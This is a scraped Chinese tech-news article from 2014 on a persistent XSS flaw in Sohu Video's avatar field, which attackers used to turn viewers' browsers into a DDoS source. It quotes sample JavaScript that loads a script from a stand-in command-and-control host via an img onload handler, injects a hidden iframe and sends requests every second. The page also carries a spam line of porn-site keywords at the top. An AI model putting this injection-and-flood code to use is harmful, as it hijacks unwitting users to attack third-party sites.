无码在线播放二区|久久亚洲精品国产精品|无码视频在线观看一区二区|在线观看国产日韩亚洲中

  • <menu id="yw4o4"></menu>
  • 
    <menu id="yw4o4"><em id="yw4o4"></em></menu>
  • 首頁 > 外聞 > 關(guān)鍵詞  > DDos攻擊最新資訊  > 正文

    搜狐視頻XSS漏洞遭利用 千萬用戶成DDOS肉雞

    2014-04-30 16:46 · 稿源:站長之家

    站長之家(Chinaz.com)4月30日消息 昨日,日本CDN服務(wù)商Incapsula撰文,稱其一位用戶遭受了一起特殊的應(yīng)用層DDos攻擊(分布式拒絕服務(wù)攻擊),本次攻擊中黑客使用的是流量劫持技術(shù)。據(jù)統(tǒng)計,共有超過2.2萬的網(wǎng)民通過瀏覽器向該用戶的網(wǎng)站發(fā)起了約為2000萬次的GET請求。這些網(wǎng)民都是在非自愿,甚至不知情的情況下成為“幫兇”的。

    Incapsula官方表示不方便透露相關(guān)網(wǎng)站信息,且其技術(shù)團(tuán)隊已在積極需找解決方案,一旦問題得到解決,便會公布更多相關(guān)細(xì)節(jié)。而據(jù)白帽子技術(shù)社區(qū)的相關(guān)信息顯示,本次攻擊事件中被利用的那個網(wǎng)站便是全球網(wǎng)站流量排名27的搜狐視頻。

    此外,Incapsula在官博中也對黑客攻擊所使用的技術(shù)進(jìn)行了解說,大致如下:

    在此次攻擊事件中,黑客利用持久性XSS漏洞,通過個人資料中的頭像設(shè)置在標(biāo)簽中注入了JS代碼。這樣一來,該圖片每被使用一次,相關(guān)惡意代碼便會傳染一次,任何用戶訪問上述頁面,都會自動執(zhí)行被惡意注入的JS代碼,從而觸發(fā)了隱藏的

    示例代碼:

    // JavaScript Injection in <img> tag enabled by Persistent XSS

    <img src="/imagename.jpg" onload="$.getScript('https://c&cdomain.com/index.html')" />

    // Malicious JavaScript opens hidden <iframe>

    function ddos(url) {

    $("body").append("<iframe id='ifr11323' style='display:none;' src='https://c&cdomain.com/index.html'></iframe>"); }

    // Ajax DDoS tool in executes GET request every second

    <html><body>

    <h1>Iframe</h1>

    <script>

    ddos('https://upload.chinaz.com//', 'https://upload.chinaz.com/2014/0430/1398849165905.jpg');

    function ddos(url,url2){

    window.setInterval(function (){

    $.getScript(url);

    $.getScript(url2);

    },1000)

    }

    </script>

    </body></html>

    被“控制”的用戶每秒都會向受害人的網(wǎng)站發(fā)起一次請求。每秒一次看似沒有多大影響,但如果一段視頻30分鐘來說,每個用戶在看視頻時都會發(fā)出1800次的請求,試想若是有成千上萬的用戶在觀看視頻的話,會如何呢?

    舉報

    • 相關(guān)推薦
    • 主機(jī)用戶受害者!任天堂、索尼或因關(guān)稅漲價30%

      最新報告指出,受美國關(guān)稅政策影響,日本游戲巨頭任天堂和索尼可能將提高其游戲主機(jī)的售價。在最有可能發(fā)生的情景下,美國消費(fèi)者購買任天堂Switch2或索尼PlayStation5的價格可能會高出多達(dá)30%。在電子游戲產(chǎn)業(yè)中,游戲主機(jī)制造商最容易受到關(guān)稅沖擊,因為他們依賴硬件業(yè)務(wù),且必須運(yùn)輸實體商品美國市場對任天堂和索尼都至關(guān)重要,分別占其營收的37%和29%。

    • 已存在23年的漏洞!谷歌Chrome將徹底修復(fù):可讀取用戶瀏覽歷史

      谷歌Chrome瀏覽器即將修復(fù)一個存在了23年之久的漏洞,該漏洞允許網(wǎng)站通過檢測網(wǎng)頁鏈接顏色來窺探用戶的瀏覽歷史。這一漏洞的修復(fù)版本Chrome136已于上周四推送至Beta通道,預(yù)計將于4月23日正式發(fā)布。瀏覽器不再維護(hù)一個全局列表是將已訪問鏈接存儲為一個三元組分區(qū),包括鏈接URL、頂級網(wǎng)站域和渲染鏈接的框架來源,只有這三個鍵完全匹配時,鏈接才會被:visitedCSS選擇器樣式化。

    • 中國人保APP流量運(yùn)營方法論曝光:精細(xì)化策略如何撬動5000萬用戶增長??

      在保險行業(yè)加速線上化轉(zhuǎn)型的浪潮中,流量運(yùn)營能力正成為衡量險企數(shù)字化競爭力的核心指標(biāo)。近日,中國人保APP公布的最新數(shù)據(jù)顯示,其累計用戶下載量突破 5000 萬,月活用戶同比增長35%,引發(fā)行業(yè)對保險流量運(yùn)營模式的新一輪探討。?流量爭奪戰(zhàn)中的“人保模式”?當(dāng)前,頭部險企APP普遍面臨用戶增長放緩、低頻使用等痛點(diǎn)。據(jù)易觀咨詢報告, 2023 年保險類APP平均月活增?

    • 供應(yīng)商停產(chǎn)DDR3/DDR4:帶動PC DRAM內(nèi)存價格上漲近5%!

      快科技5月1日消息,據(jù)TrendForce最新內(nèi)存現(xiàn)貨價格趨勢報告,全球三大DRAM供應(yīng)商宣布即將停產(chǎn)DDR3和DDR4 DRAM,引發(fā)了現(xiàn)貨市場的快速反應(yīng),買家紛紛提前囤積相關(guān)內(nèi)存產(chǎn)品。這一停產(chǎn)消息部分抵消了因美國關(guān)稅政策帶來的觀望情緒,一些買家甚至愿意接受價格上漲,以確保短期內(nèi)有足夠的庫存,總體來看,補(bǔ)貨需求的增加推動了現(xiàn)貨價格的全面上漲。在PC DRAM模塊方面,供應(yīng)商宣布停產(chǎn)的決定影響了市場情緒,買家的囤貨意愿上升,詢價數(shù)量也有所增加,價格符合市場預(yù)期上漲,采購勢頭和交易量略有改善。不過下半年的需求情況仍存在不確定性。短期

    • 網(wǎng)易云音樂緊急提醒鴻蒙用戶:平替版App千萬別下 疑藏木馬病毒

      快科技4月8日消息,日前,網(wǎng)易云音樂小客服”官方小紅書賬號發(fā)布提醒:鴻蒙系統(tǒng)能用的網(wǎng)易云音樂平替版千萬別下。網(wǎng)易云音樂小客服稱:據(jù)可靠線報,這軟件不僅偷偷調(diào)用接口 還疑似藏了木馬病毒,輕則賬號變公共點(diǎn)歌臺” ,重則錢包密碼連夜扛火車跑路。”官方表示,鴻蒙NEXT目前暫未推出云音樂官方版本,所有平替”都需警惕,同時建議已經(jīng)下載的用戶趕緊卸載,并

    • 讓AI替你打工:AI數(shù)字人直播系統(tǒng)-支持實時驅(qū)動+無限貼牌/形象克隆+短視頻合成

      數(shù)字人直播領(lǐng)域持續(xù)升溫,尤其在AI技術(shù)快速迭代的當(dāng)下,越來越多企業(yè)希望搭建專屬虛擬主播系統(tǒng),以期用數(shù)字化方案降低人力成本、替代傳統(tǒng)真人直播。然而市場產(chǎn)品良莠不齊,如何精準(zhǔn)匹配需求成為關(guān)鍵難題。今天要推薦的這款A(yù)I數(shù)字人直播系統(tǒng),正是針對這一痛點(diǎn)設(shè)計的解決方案。用戶可自主上傳品牌虛擬形象,通過智能算法快速生成高精度視頻內(nèi)容,并支持實時直播?

    • 蘋果魔改iPadOS 19:更像macOS 生產(chǎn)力大增

      知名蘋果記者M(jìn)arkGurman爆料,iPadOS19將向macOS靠攏,主要在生產(chǎn)力、多任務(wù)處理和應(yīng)用窗口管理三大方面進(jìn)行突破。MarkGurman表示,蘋果的目標(biāo)是讓iPadOS19的操作體驗更接近macOS,iPad用戶長期呼吁蘋果增強(qiáng)平板的生產(chǎn)力,這次升級可謂是眾望所歸。iPadOS將和iOS19一樣在2025年6月的WWDC開發(fā)者大會上登場。

    • DDR4市場生變!美光緊隨三星削減產(chǎn)能

      快科技4月23日消息,據(jù)媒體報道,繼三星從2025年4月起停止生產(chǎn)1y和1z納米工藝的8GB DDR4產(chǎn)品后,美光也通知客戶將停產(chǎn)服務(wù)器用的舊版DDR4模塊。同時,SK海力士也在削減DDR4產(chǎn)能,將其生產(chǎn)份額降至20%,這反映了整個行業(yè)的趨勢,內(nèi)存制造商加速產(chǎn)品過渡,將資源更多地投入到高端產(chǎn)品如HBM和DDR5中。三星已告知其供應(yīng)鏈,基于1y和1z納米工藝的8GB LPDDR4產(chǎn)品將在2025年4月達(dá)到產(chǎn)品生命周期的終點(diǎn),最后訂單截止日期為6月。此外,一些8GB和16GB的DDR4 SODIMM和UDIMM模塊也將逐步淘汰,預(yù)計最后一批出貨時間為2025年12月10日。分析人士指出,?

    • 飆臟話、性暗示……科技巨頭開始利用“成人AI”賺錢了

      “我想要你!但我得知道你是否已經(jīng)準(zhǔn)備好了。” 這是一款人工智能(AI)聊天機(jī)器人對一名自稱 14 歲的用戶所說的話……

    • 落在身上的隱翅蟲千萬不要拍打 專家:應(yīng)該吹走或撥開

      當(dāng)前正值隱翅蟲活躍季節(jié),多地醫(yī)療機(jī)構(gòu)接診因接觸隱翅蟲引發(fā)皮膚炎癥的患者數(shù)量明顯上升。這種體長約1厘米的黑黃相間昆蟲體內(nèi)含強(qiáng)酸性毒液,拍打或壓碎后接觸皮膚會導(dǎo)致紅腫、水皰等皮炎癥狀,嚴(yán)重者會出現(xiàn)皮膚潰爛。專家提醒發(fā)現(xiàn)隱翅蟲時應(yīng)輕輕吹走或用物品撥開,切忌直接拍打。若接觸毒液應(yīng)立即用大量清水沖洗并就醫(yī)。建議夜間關(guān)好紗窗,減少與隱翅蟲接觸機(jī)會。近期南方地區(qū)降雨頻繁,適宜隱翅蟲繁殖,相關(guān)病例有所增加。醫(yī)生建議出現(xiàn)癥狀時避免抓撓患處,防止繼發(fā)感染,并及時就醫(yī)。

    熱文

    • 3 天
    • 7天